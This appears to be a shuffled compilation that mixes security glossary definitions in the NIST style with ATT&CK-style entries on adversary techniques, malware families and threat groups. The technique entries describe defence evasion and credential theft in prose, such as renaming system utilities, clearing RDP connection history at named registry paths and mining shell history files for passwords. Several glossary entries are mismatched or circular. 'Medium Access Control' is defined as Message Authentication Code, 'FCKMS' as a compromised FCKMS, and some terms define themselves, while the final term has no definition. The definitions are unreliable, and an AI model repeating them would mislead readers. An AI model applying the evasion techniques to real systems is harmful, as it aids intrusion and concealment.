Type: attack-pattern
Description: Adversaries may rename legitimate / system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for legitimate utilities adversaries are capable of abusing, including both built-in binaries and tools such as PSExec, AutoHotKey, and IronPython. It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>). An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on these utilities executing from non-standard paths.

Term: Reference Document Element
Definition: A discrete section, sentence, phrase, or other identifiable piece of content of a Reference Document.

Term: Problematic Data Action
Definition: A data action that could cause an adverse effect for individuals.

Term: module
Definition: The set of hardware, software, and/or firmware that implements security functions (including cryptographic algorithms and key generation) and is contained within a cryptographic module boundary. See [FIPS 140].

Term: unsupervised learning
Definition: A type of machine learning in which a model learns based on pat­terns in unlabeled data, such as learning a function to cluster or group data points.

Term: harm
Definition: Any adverse effects that would be experienced by an individual (i.e., that may be socially, physically, or financially damaging) or an organization if the confidentiality of PII were breached.

Term: availability
Definition: 2. Timely, reliable access to data and information services for authorized users.

Term: plaintext
Definition: Intelligible data, the semantic content of which is available without using cryptographic techniques.

Term: Medium Access Control
Definition: Message Authentication Code.

Term: Version Scanning
Definition: The process of identifying the service application and application version currently in use.

Term: risk evaluation
Definition: Process of comparing the results of risk analysis with risk criteria to determine whether the risk and/or its magnitude is acceptable or tolerable.

Name: Reaver
Type: malware
Description: Reaver is a malware family that has been in the wild since at least late 2016. Reporting indicates victims have primarily been associated with the "Five Poisons," which are movements the Chinese government considers dangerous. The type of malware is rare due to its final payload being in the form of Control Panel items.

Term: Wireless Local Area Network (WLAN)
Definition: A group of wireless APs and associated infrastructure within a limited geographic area, such as an office building or building campus, that is capable of radio communications. WLANs are usually implemented as extensions of existing wired LANs to provide enhanced user mobility.

Term: Benchmark Consumer
Definition: A product that accepts an existing XCCDF benchmark document, processes it, and produces an XCCDF results document.

Term: Intended signatory
Definition: An entity that intends to generate digital signatures in the future.

Term: Ephemeral key pair
Definition: A short-term key pair used with a public-key (asymmetric-key) algorithm that is generated when needed; the public key of an ephemeral key pair is not provided in a public key certificate, unlike static public keys which are often included in a certificate.

Term: SHA-2
Definition: A hash algorithm with the property that it is computationally infeasible 1) to find a message that corresponds to a given message digest, or 2) to find two different messages that produce the same message digest.

Name: down_new
Type: malware
Description: down_new is a downloader that has been used by BRONZE BUTLER since at least 2019.

Term: token
Definition: Something that the Claimant possesses and controls (typically a key or password) that is used to authenticate the Claimant’s identity.

Term: hacker
Definition: Unauthorized user who attempts to or gains access to an information system.

Name: ESXi Administration Command
Type: attack-pattern
Description: Adversaries may abuse ESXi administration services to execute commands on guest machines hosted within an ESXi virtual environment. Persistent background services on ESXi-hosted VMs, such as the VMware Tools Daemon Service, allow for remote management from the ESXi server. The tools daemon service runs as `vmtoolsd.exe` on Windows guest operating systems, `vmware-tools-daemon` on macOS, and `vmtoolsd ` on Linux. 

Adversaries may leverage a variety of tools to execute commands on ESXi-hosted VMs – for example, by using the vSphere Web Services SDK to programmatically execute commands and scripts via APIs such as `StartProgramInGuest`, `ListProcessesInGuest`, `ListFileInGuest`, and `InitiateFileTransferFromGuest`. This may enable follow-on behaviors on the guest VMs, such as File and Directory Discovery, Data from Local System, or OS Credential Dumping.

Term: likelihood
Definition: Chance of something happening.

Term: (t + k)-way combination coverage
Definition: For a given test set that provides 100% t-way coverage for n variables, (t+k)-way combination coverage is the proportion of (t+k)-way combinations of n variables for which all variable-values configurations are fully covered.

Name: Stored Data Manipulation
Type: attack-pattern
Description: Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

Term: key
Definition: A  binary  string  used  as  a  secret  parameter  by  a  cryptographic algorithm. In this Recommendation, a cryptographic key shall be either a truly random binary string of a length specified by the cryptographic algorithm or a pseudorandom binary string of the specified length that is computationally indistinguishable from one selected uniformly at random from the set of all binary strings of that length.

Term: cyber resiliency design principle
Definition: A guideline for how to select and apply cyber resiliency analysis methods, techniques, approaches, and solutions when making architectural or design decisions.

Term: FCKMS
Definition: An FCKMS whose data have been subjected to unauthorized access, modification, or disclosure while contained within the FCKMS.

Term: <em>⎾x⏋</em>
Definition: The ceiling of x; the smallest integer ≥ x. For example,⎾5⏋= 5 and⎾5.3⏋= 6.

Name: Event Triggered Execution
Type: attack-pattern
Description: Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.

Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.

Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges.

Term: accuracy
Definition: The degree to which the noisy and unaltered versions of a query’s output differ.

Name: Orangeworm
Type: intrusion-set
Description: Orangeworm is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage. Reverse engineering of Kwampirs, directly associated with Orangeworm activity, indicates significant functional and development overlaps with Shamoon.

Name: Install Digital Certificate
Type: attack-pattern
Description: Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.

Adversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: Asymmetric Cryptography with Web Protocols) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers. 

Adversaries can obtain digital certificates (see Digital Certificates) or create self-signed certificates (see Digital Certificates). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired (Acquire Infrastructure) or previously compromised (Compromise Infrastructure).

Term: Legacy Environment
Definition: Custom environment usually involving older systems or applications.

Term: <em>Z</em>
Definition: A shared secret (represented as a byte string) that is used to derive secret keying material using a key derivation method.

Name: certutil
Type: tool
Description: certutil is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services.

Term: Cradle
Definition: A docking station, which creates an interface between a user’s PC and PDA and enables communication and battery recharging.

Term: False Positive
Definition: An alert that incorrectly indicates that a vulnerability is present.

Term: <em>a</em>
Definition: The octet length of the associated data.

Term: Entity registration
Definition: A function in the lifecycle of a cryptographic key; a process whereby an entity becomes a member of a security domain.

Term: Well-formed
Definition: An SCAP-conformant data stream or stream component.

Name: Higaisa
Type: intrusion-set
Description: Higaisa is a threat group suspected to have South Korean origins. Higaisa has targeted government, public, and trade organizations in North Korea; however, they have also carried out attacks in China, Japan, Russia, Poland, and other nations. Higaisa was first disclosed in early 2019 but is assessed to have operated as early as 2009.

Term: Association
Definition: A relationship for a particular purpose; for example, a key is associated with the application or process for which it will be used.

Term: <strong>Shall</strong>
Definition: Used to indicate a requirement of this Recommendation. "Shall" may be coupled with "not" to become "shall not."

Term: cryptographic key
Definition: A parameter that determines the transformation from plaintext to ciphertext and vice versa. (A DEA key is a 64-bit parameter consisting of 56 independent bits and 8 parity bits). Multiple (1, 2 or 3) keys may be used in the Triple Data Encryption Algorithm.

Term: system element
Definition: Member of a set of elements that constitute a system.

Term: DSIG
Definition: An asymmetric key operation where the private key is used to digitally sign data and the public key is used to verify the signature. Digital signatures provide authenticity protection, integrity protection, and non-repudiation.

Term: Reference Document Element
Definition: A discrete section, sentence, phrase, or other identifiable piece of content from a Reference Document.

Term: Key-derivation function
Definition: A function that − with the input of a cryptographic key or shared secret and possibly other data − generates a binary string, called keying material.

Name: Clear Network Connection History and Configurations
Type: attack-pattern
Description: Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as Remote Services or External Remote Services. Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.

Network connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under :

* <code>HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers</code>

Windows may also store information about recent RDP connections in files such as <code>C:\Users\\%username%\Documents\Default.rdp</code> and `C:\Users\%username%\AppData\Local\Microsoft\Terminal
Server Client\Cache\`. Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).

Malicious network connections may also require changes to third-party applications or network configuration settings, such as Disable or Modify System Firewall or tampering to enable Proxy. Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.

Name: Inter-Process Communication
Type: attack-pattern
Description: Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. 

Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows Dynamic Data Exchange or Component Object Model. Linux environments support several different IPC mechanisms, two of which being sockets and pipes. Higher level execution mediums, such as those of Command and Scripting Interpreters, may also leverage underlying IPC mechanisms. Adversaries may also use Remote Services such as Distributed Component Object Model to facilitate remote IPC execution.

Term: approved
Definition: FIPS approved or NIST Recommended. An algorithm or technique that is either 1) specified in a FIPS or NIST Recommendation, or 2) adopted in a FIPS or NIST Recommendation or 3) specified in a list of NIST Approved security functions.

Name: Saint Bear
Type: intrusion-set
Description: Saint Bear is a Russian-nexus threat actor active since early 2021, primarily targeting entities in Ukraine and Georgia. The group is notable for a specific remote access tool, Saint Bot, and information stealer, OutSteel in campaigns. Saint Bear typically relies on phishing or web staging of malicious documents and related file types for initial access, spoofing government or related entities. Saint Bear has previously been confused with Ember Bear operations, but analysis of behaviors, tools, and targeting indicates these are distinct clusters.

Name: Establish Accounts
Type: attack-pattern
Description: Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.

For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.

Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for Phishing for Information or Phishing. In addition, establishing accounts may allow adversaries to abuse free services, such as registering for trial periods to Acquire Infrastructure for malicious purposes.

Name: Malicious Link
Type: attack-pattern
Description: An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Link. Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via Exploitation for Client Execution. Links may also lead users to download files that require execution via Malicious File.

Name: Sliver
Type: tool
Description: Sliver is an open source, cross-platform, red team command and control (C2) framework written in Golang. Sliver includes its own package manager, "armory," for staging and downloading additional tools and payloads to the primary C2 framework.

Term: security requirement
Definition: A requirement levied on an information system or an organization that is derived from applicable laws, Executive Orders, directives, policies, standards, instructions, regulations, procedures, and/or mission/business needs to ensure the confidentiality, integrity, and availability of information that is being processed, stored, or transmitted.
Note: Security requirements can be used in a variety of contexts from high-level policy-related activities to low-level implementation-related activities in system development and engineering disciplines.

Term: Master Terminal Unit (MTU)
Definition: A controller that also acts as a server that hosts the control software that communicates with lower-level control devices, such as remote terminal units (RTUs) and programmable logic controllers (PLCs), over an OT network. In a SCADA system, this is often called a SCADA server, MTU, or supervisory controller.

Term: roots of trust
Definition: A starting point that is implicitly trusted.

Term: Authenticated Configuration Scanner
Definition: A product that runs with administrative or root privileges on a target system to conduct its assessment.

Term: (p, t)-completeness
Definition: For a given set of n variables, (p, t)-completeness is the proportion of the C(n, t) combinations that have configuration coverage of at least p.

Term: Key life cycle
Definition: The period of time between the creation of the key and its destruction.

Term: Function
Definition: Used interchangeably with algorithm in this document.

Term: malware
Definition: A program that is inserted into a system, usually covertly, with the intent of compromising the confidentiality, integrity, or availability of the victim’s data, applications, or operating system or of otherwise annoying or disrupting the victim.

Term: Passphrase
Definition: A password used to protect an identity key. After entered by a user or  administrator, a passphrase is mathematically converted into large number which serves as a key that is used to encrypt the identity key. In order to decrypt the identity, the passphrase must be entered again so that the same key can be regenerated for decryption.

Term: Final Checklist List (FCL)
Definition: The listing of all final checklists on the NIST repository.

Name: Psylo
Type: malware
Description: Psylo is a shellcode-based Trojan that has been used by Scarlet Mimic. It has similar characteristics as FakeM.

Term: concept of secure function
Definition: A strategy for achievement of secure system function that embodies proactive and reactive protection capability of the system.
Note 1: This strategy strives to prevent, minimize, or detect the events and conditions that can lead to the loss of an asset and the resultant adverse impact; prevent, minimize, or detect the loss of an asset or adverse asset impact; continuously deliver system capability at some acceptable level despite the impact of threats or uncertainty; and recover from an adverse asset impact to restore full system capability or to recover to some acceptable level of system capability.
Note 2: The concept of secure function is adapted from historical and other secure system concepts such as Philosophy of Protection, Theory of Design and Operation, and Theory of Compliance.

Term: information system security plan
Definition: See security plan.

Term: exclusive-OR
Definition: The bit-by-bit modulo 2 addition of binary vectors of equal length.

Name: Silver Ticket
Type: attack-pattern
Description: Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.

Silver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.

Password hashes for target services may be obtained using OS Credential Dumping or Kerberoasting.

Term: MFA
Definition: Authentication using two or more different factors to achieve authentication. Factors include something you know (e.g., PIN, password), something you have (e.g., cryptographic identification device, token), or something you are (e.g., biometric). See authenticator.

Term: Cryptographic mechanism
Definition: An element of a cryptographic application, process, module or device that provides a cryptographic service, such as confidentiality, integrity, source authentication, and access control (e.g., encryption and decryption, and digital signature generation and verification).

Term: key transport
Definition: A (pair-wise) key-establishment procedure whereby one party (the sender) selects a value for the secret keying material and then securely distributes that value to another party (the receiver). Contrast with key agreement.

Term: non-repudiation
Definition: A service that may be afforded by the appropriate application of a digital signature. Non-repudiation refers to the assurance that the owner of a signature key pair that was capable of generating an existing signature corresponding to certain data cannot convincingly deny having signed the data.

Term: Signature-in-question
Definition: The digital signature to be verified and validated.

Term: Namespace isolation
Definition: A form of isolation that limits which resources a container may interact with.

Term: Personal Information
Definition: Information which can be used to distinguish or trace the identity of an individual (e.g., name, social security number, biometric records, etc.) alone, or when combined with other personal or identifying information which is linked or linkable to a specific individual (e.g., date and place of birth, mother’s maiden name, etc.).

Term: system-related privacy risk
Definition: Risk to an individual or individuals associated with the agency’s creation, collection, use, processing, storage, maintenance, dissemination, disclosure, and disposal of their PII. See risk.

Term: Domain parameter
Definition: Parameters used with a cryptographic algorithm that are usually common to a domain of users.

Term: RP
Definition: An entity that relies upon the subscriber’s authenticator(s) and credentials or a verifier’s assertion of a claimant’s identity, typically to process a transaction or grant access to information or a system.

Term: security architecture
Definition: A set of physical and logical security-relevant representations (i.e., views) of system architecture that conveys information about how the system is partitioned into security domains and makes use of security-relevant elements to enforce security policies within and between security domains based on how data and information must be protected.
Note: The security architecture reflects security domains, the placement of security-relevant elements within the security domains, the interconnections and trust relationships between the security-relevant elements, and the behavior and interactions between the security-relevant elements. The security architecture, similar to the system architecture, may be expressed at different levels of abstraction and with different scopes.

Term: <em>HMAC-hash</em>
Definition: Keyed-hash Message Authentication Code (as specified in [FIPS 198]) with an approved hash function hash.

Term: approach
Definition: See cyber resiliency implementation approach.

Term: blended attack
Definition: Deliberate, aggressive action that causes harm to both cyber and physical systems.

Name: LightSpy
Type: malware
Description: First observed in 2018, LightSpy is a modular malware family that initially targeted iOS devices in Southern Asia before expanding to Android and macOS platforms. It consists of a downloader, a main executable that manages network communications, and functionality-specific modules, typically implemented as `.dylib` files (iOS, macOS) or `.apk` files (Android). LightSpy can collect VoIP call recordings, SMS messages, and credential stores, which are then exfiltrated to a command and control (C2) server.

Term: <em>L-bit Hash Function</em>
Definition: A hash function for which the length of the output is L bits.

Name: WindTail
Type: malware
Description: WindTail is a macOS surveillance implant used by Windshift. WindTail shares code similarities with Hack Back aka KitM OSX.

Name: Shell History
Type: attack-pattern
Description: Adversaries may search the command history on compromised systems for insecurely stored credentials.

On Linux and macOS systems, shells such as Bash and Zsh keep track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user's history file. For each user, this file resides at the same location: for example, `~/.bash_history` or `~/.zsh_history`. Typically, these files keeps track of the user's last 1000 commands.

On Windows, PowerShell has both a command history that is wiped after the session ends, and one that contains commands used in all sessions and is persistent. The default location for persistent history can be found in `%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt`, but command history can also be accessed with `Get-History`. Command Prompt (CMD) on Windows does not have persistent history.

Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials.

Term: Domain parameter seed
Definition: A string of bits that is used as input for a domain parameter generation or validation process.

Term: Non-Owner
Definition: An Informative Reference produced by anyone who is NOT the owner of the Reference Document.

Name: SYSCON
Type: malware
Description: SYSCON is a backdoor that has been in use since at least 2017 and has been associated with campaigns involving North Korean themes. SYSCON has been delivered by the CARROTBALL and CARROTBAT droppers.

Term: Checklist Type
Definition: The type of checklist, such as Compliance, Vulnerability, and Specialized.

Term: dual-use foundation model
Definition: <p>An AI model that is trained on broad data; generally uses self-supervision; contains at least tens of billions of parameters; is applicable across a wide range of contexts; and that exhibits, or could be easily modified to exhibit, high levels of performance at tasks that pose a serious risk to security, national economic security, national public health or safety, or any combination of those matters, such as by:</p><p style="margin-left:40px;">(i) substantially lowering the barrier of entry for non-experts to design, synthesize, acquire, or use chemical, biological, radiological, or nuclear (CBRN) weapons;</p><p style="margin-left:40px;">(ii) enabling powerful offensive cyber operations through automated vulnerability discovery and exploitation against a wide range of potential targets of cyber attacks; or</p><p style="margin-left:40px;">(iii) permitting the evasion of human control or oversight through means of deception or obfuscation.</p><p>Models meet this definition even if they are provided to end users with technical safeguards that attempt to prevent users from taking advantage of the relevant unsafe capabilities.</p>

Term: Banner Grabbing
Definition: The process of capturing banner information—such as application type and version— that is transmitted by a remote port when a connection is initiated.

Term: Security Parameters Index (SPI)
Definition: An arbitrarily chosen value that acts as a unique identifier for an IPsec connection.

Term: Consensus model
Definition: A process to achieve agreement within a distributed system on the valid state.

Term: resolution
Definition: The process of collecting information about an applicant to uniquely distinguish an individual within the context of the population that the CSP serves.

Term: Policy
Definition: Statements, rules, or assertions that specify the correct or expected behavior of an entity. For example, an authorization policy might specify the correct access control rules for a software component.

Term: system of record
Definition: A collection of records that contain information about individuals and are under the control of an agency. The records can be retrieved by the individual’s name, an identifying number, a symbol, or other identifier.

Term: computerized telephone system (CTS)
Definition: A generic term used to describe any telephone system that uses centralized stored program computer technology to provide switched telephone networking features and services. CTSs are referred to commercially, by such terms, as: computerized private branch exchange (CPBX); private branch exchange (PBX); private automatic branch exchange (PABX); electronic private automatic branch exchange (EABX); computerized branch exchange (CBX); computerized key telephone systems (CKTS); hybrid key systems; business communications systems; and office communications systems.

Name: LockBit 2.0
Type: malware
Description: LockBit 2.0 is an affiliate-based Ransomware-as-a-Service (RaaS) that has been in use since at least June 2021 as the successor to LockBit Ransomware. LockBit 2.0 has versions capable of infecting Windows and VMware ESXi virtual machines, and has been observed targeting multiple industry verticals globally.

Term: Product Output
Definition: Information produced by a product. This includes the product user interface, human-readable reports, and machine-readable reports. Unless otherwise indicated by a specific requirement, there are no constraints on the format. When this output is evaluated in a test procedure, either all or specific forms of output will be sampled as indicated by the test procedure.

Name: ELMER
Type: malware
Description: ELMER is a non-persistent, proxy-aware HTTP backdoor written in Delphi that has been used by APT16.

Term: CMAC
Definition: Cipher-based Message Authentication Code (as specified in NIST SP 800-38B).

Term: Manual key transport
Definition: A non-automated means of transporting cryptographic keys by physically moving a device, document or person containing or possessing the key or key component.

Term: SMS Chat
Definition: A facility for exchanging messages in real-time using SMS text messaging that allows previously exchanged messages to be viewed.

Term: Non-assurance message
Definition: A signed message that does not contain all information required for an assurance message.

Term: system of records notice
Definition: The Privacy Act requires each agency to publish a notice of its systems of records in the Federal Register. This is called a System of Record Notice (SORN).

Name: Clipboard Data
Type: attack-pattern
Description: Adversaries may collect data stored in the clipboard from users copying information within or between applications. 

For example, on Windows adversaries can access clipboard data by using <code>clip.exe</code> or <code>Get-Clipboard</code>. Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., Transmitted Data Manipulation).

macOS and Linux also have commands, such as <code>pbpaste</code>, to grab clipboard contents.

Term: digital signature
Definition: The result of a cryptographic transformation of data that, when properly implemented, provides origin authentication, data integrity and signatory non-repudiation.

Term: COMSEC service authority
Definition: See service authority.

Term: Distributed network
Definition: A network configuration where every participant can communicate with one another without going through a centralized point. Since there are multiple pathways for communication, the loss of any participant will not prevent communication. This is also known as peer-to-peer network.

Term: subsystem
Definition: A major subdivision or component of an information system consisting of information, information technology, and personnel that perform one or more specific functions.

Term: Moderate Impact
Definition: The loss of confidentiality, integrity, or availability that could be expected to have a serious adverse effect on organizational operations, organizational assets, individuals, other organizations, or the national security interests of the United States (i.e., 1) causes a significant degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is significantly reduced; 2) results in significant damage to organizational assets; 3) results in significant financial loss; or 4) results in significant harm to individuals that does not involve loss of life or serious life-threatening injuries).

Term: Context
Definition: The circumstances surrounding the system's processing of PII.

Name: ccf32
Type: malware
Description: ccf32 is data collection malware that has been used since at least February 2019, most notably during the FunnyDream campaign; there is also a similar x64 version.

Term: OPSEC
Definition: Systematic and proven process by which potential adversaries can be denied information about capabilities and intentions by identifying, controlling, and protecting generally unclassified evidence of the planning and execution of sensitive activities. The process involves five steps: identification of critical information, analysis of threats, analysis of vulnerabilities, assessment of risks, and application of appropriate countermeasures.

Term: Key component
Definition: See Cryptographic key component.

Term: accreditation
Definition: See authorization.

Term: message digest
Definition: See message digest.

Term: sanitization
Definition: A process to remove information from media such that data recovery is not possible, including the removal of all classified labels, markings, and activity logs.

Term: Entropy
Definition: The entropy of a random variable X is a mathematical measure of the expected amount of information provided by an observation of X. As such, entropy is always relative to an observer and his or her knowledge prior to an observation.

Term: MATLAB
Definition: An integrated, technical computer environment that combines numeric computation, advanced graphics and visualization, and a high level programming language. MATLAB includes functions for data analysis and visu alization; numeric and symbolic computation; engineering and scientific graphics; modeling, simulation and prototyping; and programming, application development and a GUI design.

Term: Current Profile
Definition: the ‘as is’ state of system cybersecurity

Term: information technology product
Definition: A discrete, identifiable information technology asset that represents a building block of a system and may include hardware, software, and firmware.

Term: DoS
Definition: The prevention of authorized access to resources or the delaying of time-critical operations. (Time-critical may be milliseconds or it may be hours, depending upon the service provided).

Term: Buffer Overflow Attack
Definition: A method of overloading a predefined amount of space in a buffer, which can potentially overwrite and corrupt memory in data.

Term: <strong>Shall</strong>
Definition: Used to indicate a requirement of this Recommendation.

Term: FCKMS service-using organization
Definition: A Federal organization or contractor that has selected an FCKMS service provider to provide key-management services.

Name: Application Layer Protocol
Type: attack-pattern
Description: Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 

Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, DNS, or publishing/subscribing. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.

Term: public key certificate
Definition: A digital document issued and digitally signed by the private key of a certification authority that binds an identifier to a cardholder through a public key. The certificate indicates that the cardholder identified in the certificate has sole control and access to the private key.

Term: safeguards
Definition: The safeguards or countermeasures prescribed for an information system or an organization to protect the confidentiality, integrity, and availability of the system and its information.

Term: authenticated protected channel
Definition: An encrypted communication channel that uses approved cryptography in which the connection initiator (client) has authenticated the recipient (server). Authenticated protected channels are encrypted to provide confidentiality and protection against active intermediaries and are frequently used in the user authentication process. Transport Layer Security (TLS) and Datagram Transport Layer Security (DTLS) [RFC 9325] are examples of authenticated protected channels in which the certificate presented by the recipient is verified by the initiator. Unless otherwise specified, authenticated protected channels do not require the server to authenticate the client. Authentication of the server is often accomplished through a certificate chain that leads to a trusted root rather than individually with each server.

Term: Enterprise Subsystem
Definition: The portion of the RFID system that analyzes, processes, and stores information collected by the RF subsystem. The primary role of the enterprise subsystem is to make the data collected by the RF subsystem useful for a supporting business process. An enterprise subsystem is made up of middleware, analytic systems, and network infrastructure.

Term: KMP
Definition: A high-level document that identifies a high-level structure, responsibilities, governing standards and guidelines, organizational dependencies and other relationships, and security policies.

Name: ROKRAT
Type: malware
Description: ROKRAT is a cloud-based remote access tool (RAT) used by APT37 to target victims in South Korea. APT37 has used ROKRAT during several campaigns from 2016 through 2021.

Term: RTO
Definition: The overall length of time an information system’s components can be in the recovery phase before negatively impacting the organization’s mission or mission/business processes.

Term: Critical Value
Definition: The value that is exceeded by the test statistic with a small probability (significance level). A "look-up" or calculated value of a test statistic (i.e., a test statistic value) that, by construction, has a small probability of

Term: SAISO
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers.
[Note: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.]

Term: measures
Definition: Quantifiable and objective values that result from measurement.

Term: Primitive
Definition: See cryptographic primitive.

Term: privileged command
Definition: A human-initiated command executed on a system that involves the control, monitoring, or administration of the system, including security functions and associated security-relevant information.

Term: traceability, metrological
Definition: Property of a measurement result whereby the result can be related to a reference through a documented, unbroken chain of calibrations, each contributing to the measurement uncertainty.

Name: Native API
Type: attack-pattern
Description: Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.

Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to Command and Scripting Interpreter, the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.

Native API functions (such as <code>NtCreateProcess</code>) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API <code>CreateProcess()</code> or GNU <code>fork()</code> will allow programs and scripts to start other processes. This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.

Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.

Adversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks. Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via Disable or Modify Tools.

Term: senior information security officer (SISO)
Definition: See senior agency information security officer (SAISO).

Term: Secure Hash Algorithm
Definition: Secure Hash Algorithm.

Term: service
Definition: A capability or function provided by an entity.

Name: BitPaymer
Type: malware
Description: BitPaymer is a ransomware variant first observed in August 2017 targeting hospitals in the U.K. BitPaymer uses a unique encryption key, ransom note, and contact information for each operation. BitPaymer has several indicators suggesting overlap with the Dridex malware and is often delivered via Dridex.

Name: Server
Type: attack-pattern
Description: Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a Server or Virtual Private Server, adversaries may compromise third-party servers in support of operations.

Adversaries may also compromise web servers to support watering hole operations, as in Drive-by Compromise, or email servers to support Phishing operations.

Term: trustworthiness
Definition: The interdependent combination of attributes of a person, system, or enterprise that provides confidence to others of the qualifications, capabilities, and reliability of that entity to perform specific tasks and fulfill assigned responsibilities. The degree to which a system (including the technology components that are used to build the system) can be expected to preserve the confidentiality, integrity, and availability of the information being processed, stored, or transmitted by the system across the full range of threats.

Term: SIGE(…)
Definition: A digital signature generated by the entity E using an approved hash function and an approved digital signature algorithm. The data that is signed is the information contained within the parentheses.

Term: artificial intelligence
Definition: A machine-based system that can, for a given set of human-defined objectives, make predictions, recommendations, or decisions influencing real or virtual environments.

Term: non-repudiation
Definition: Assurance the sender of data is provided with proof of delivery and the recipient is provided with proof of the sender’s identity, so neither can later deny having processed the data.

Term: PII
Definition: Any information about an individual that can be used to distinguish or trace an individual's identify and any other information that is linked or linkable to an individual.

Term: Public and Private Key
